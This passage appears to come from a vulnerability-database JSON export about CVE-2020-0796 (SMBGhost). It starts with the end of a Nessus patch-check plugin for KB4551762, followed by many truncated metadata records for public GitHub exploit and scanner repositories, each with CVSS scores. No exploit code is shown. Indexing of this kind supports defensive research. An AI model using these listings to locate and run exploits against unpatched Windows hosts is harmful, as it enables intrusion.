script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4551762');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"03_2020_2\",\n bulletin:bulletin,\n rollup_kb_list:[4551762])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"03_2020_2\",\n bulletin:bulletin,\n rollup_kb_list:[4551762])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-08-18T04:22:57", "description": "# CVE-2020-0796 Remote overflow PO...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-28T05:23:20", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-09-28T05:37:37", "id": "243C313B-7F90-56EA-BE8E-35A8DFFAEDB2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-08T14:06:25", "description": "# CVE-2020-0796-SMB\n\u8be5\u8d44\u6e90\u4e3aCVE-2020-0796\u6f0f\u6d1e\u590d\u73b0\uff0c\u5305\u62ecPython\u7248\u672c\u548cC++\u7248\u672c\u3002\u4e3b\u8981\u662f\u96c6\u5408...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-02T12:12:03", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-06-08T03:05:02", "id": "A0F56F7F-FBEC-52A7-8D05-19E0EF3E860F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-11T13:52:54", "description": "# CVE-2020-0796\nWorking Exploit PoC (CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-22T09:09:02", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-03-11T09:59:14", "id": "7B8853FF-7CB4-5F4D-B185-FE434458F43D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:04:43", "description": "# CVE-2020-0796\n-----------\n\n# T\u1ed5ng quan:\nT\u00ednh n\u0103ng compression ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-10T02:35:34", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-12-25T09:08:30", "id": "1D1C90C4-5D8F-58C4-B5AA-805F46862E47", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:01", "description": "# SMBScanner\n Multithread SMB scanner to check CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T20:07:44", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-12-20T23:48:47", "id": "52AA3134-2731-589A-BE46-26ABB8039FE2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:58:14", "description": "# CVE-2020-0796-POC\n# \u53d7\u5f71\u54cd\u7cfb\u7edf\u7248\u672c\n\u6f0f\u6d1e\u4e0d\u5f71\u54cdwin7\uff0c\u6f0f\u6d1e\u5f71\u54cdWindows 10 1903\u4e4b\u540e\u7684\u5404\u4e2a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-06T03:56:52", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-11-06T05:27:47", "id": "D6044381-6C6F-56BC-81B3-86E4B5FC5200", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-09T00:15:09", "description": "Usage:\n\nMake sure Python is installed, then run poc.py.\n\n\nWindow...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-20T09:00:08", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-02-08T17:19:05", "id": "D4A83665-CEF3-5877-9DA4-B03A23BF7461", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:45:35", "description": "# SMBv3 Ghost...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-09T06:18:54", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-10T12:36:18", "id": "0522E1EF-0AC6-5DD5-A6DA-6BF91F5A89C4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:04:00", "description": "# CVE-2020-0796\nlocal exploit\n\n\ni also got this from the interne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-11T04:48:26", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-06-10T10:41:17", "id": "1B787DF3-D66A-5A51-AB8B-DA600B216482", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:13", "description": "# SMBGhost\nAdvanced scanner for CVE-2020-0796 - SMBv3 RCE using ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-14T02:07:16", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-12-05T20:40:38", "id": "484522F4-99E8-5FCE-9CB6-2DB46070E529", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:10:15", "description": "# CVE-2020-0796\r\n\r\nWindows SMBv3 LPE Exploit\r\n\r\n![exploit](https...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-05-28T08:41:12", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-05-28T08:42:12", "id": "6F29B32B-8480-51E3-8B87-96FBE89C9ADD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T05:55:02", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-05-12T14:41:27", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-04-20T10:00:40", "id": "9A4DB349-101D-5E66-BEB7-19D62F777B8A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:09", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T06:38:05", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-02-14T02:17:42", "id": "9B986515-0778-5365-8693-2669FC74128A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:16:33", "description": "# SMBGhost\nSimple scanner for CVE-2020-0796 - SMBv3 RCE.\n\nThe sc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-04T15:07:15", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-09-12T02:41:33", "id": "4A6EBCA8-D007-5E59-94B8-7BDA780D94B5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:15:09", "description": "# CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-09T08:19:55", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-10-09T08:24:27", "id": "DE92AD9C-F346-5416-A5F0-5AEC963C9F3B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-16T15:24:31", "description": "# CVE-2020-0796\r\n\r\nWindows SMBv3 LPE Exploit\r\n\r\n![exploit](https...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-30T11:42:56", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-08-16T13:42:23", "id": "2F2D8C81-E148-5A14-8750-9403AFEB21A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T08:26:25", "description": "# SMBGhost (CVE-2020-0796) Automate Exploitation and Detection\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-10T16:44:39", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-08-13T03:25:18", "id": "22C095F3-54B6-532B-AE10-73BEE3624D57", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:48:16", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-09T04:52:55", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-11-26T15:51:17", "id": "935331CB-5C0B-5059-BAC4-383651C26C94", "href": "", "cvss": {"score": 